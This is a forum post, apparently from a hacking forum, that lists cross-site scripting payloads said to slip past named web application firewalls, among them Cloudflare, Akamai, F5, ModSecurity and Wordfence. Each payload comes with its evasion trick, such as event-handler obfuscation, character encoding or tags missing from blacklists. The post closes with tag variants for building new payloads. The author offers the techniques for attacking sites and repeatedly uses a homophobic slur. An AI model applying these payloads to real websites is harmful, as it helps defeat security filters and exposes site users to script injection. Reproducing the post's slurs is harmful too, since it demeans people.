- Joined
- Aug 19, 2023
- Messages
- 911
- Reaction score
- 40,589
- Points
- 93
- Thread Author
- #1
SOME WAYS FOR BYPASSING WAF IN DIFF ( CLOUDFLARE , DOTDEFENDER,F5,COMODO,AKAMAI.....
Name: Cloudflare
Payload: <a"/onclick=(confirm)()>click
MSVK METHOD of FUCKING THIS GAY : Non-white space filler
Name: Wordfence
Payload: <a/href=javascript:alert()>click
MSVK METHOD of FUCKING THIS GAY : Numeric character encoding
Name: Barracuda
Payload: <a/href=Java%0a%0d%09script:alert()>click
MSVK METHOD of FUCKING THIS GAY : Numeric character encoding
Name: Akamai
Payload: <d3v/onauxclick=[2].some(confirm)>click
MSVK METHOD of FUCKING THIS GAY : Missing event handler from blacklist and function call obfuscation
Name: Comodo
Payload: <d3v/onauxclick=(((confirm)))``>click
MSVK METHOD of FUCKING THIS GAY : Missing event handler from blacklist and function call obfuscation
Name: F5
Payload: <d3v/onmouseleave=[2].some(confirm)>click
MSVK METHOD of FUCKING THIS GAY : Missing event handler from blacklist and function call obfuscation
Name: ModSecurity
Payload: <details/open/ontoggle=alert()>
MSVK METHOD of FUCKING THIS GAY : Missing tag (event handler too?) from blacklist
Name: dotdefender
Payload: <details/open/ontoggle=(confirm)()//
MSVK METHOD of FUCKING THIS GAY : Missing tag from blacklist, function call obfuscation and alternate tag ending
tHERE are MANY other ways BUT THE basic is the method THAT i have SAID you can created a new payload with diff tags and payload shits like this
<payload>
<payload
<payload{space}
<payload//
<payload%27
<payloAD
<payloade$%
<payload [doublespace]/
<payload%0a
<payload%0d
<payload%09
ANd many welp i can say most of the portection are bypassable you just needa go through t
esting and probing and shitting with this gays
USe this gay https://en.wikipedia.org/wiki/Numeric_ch..._reference to try and find the ways for thise holes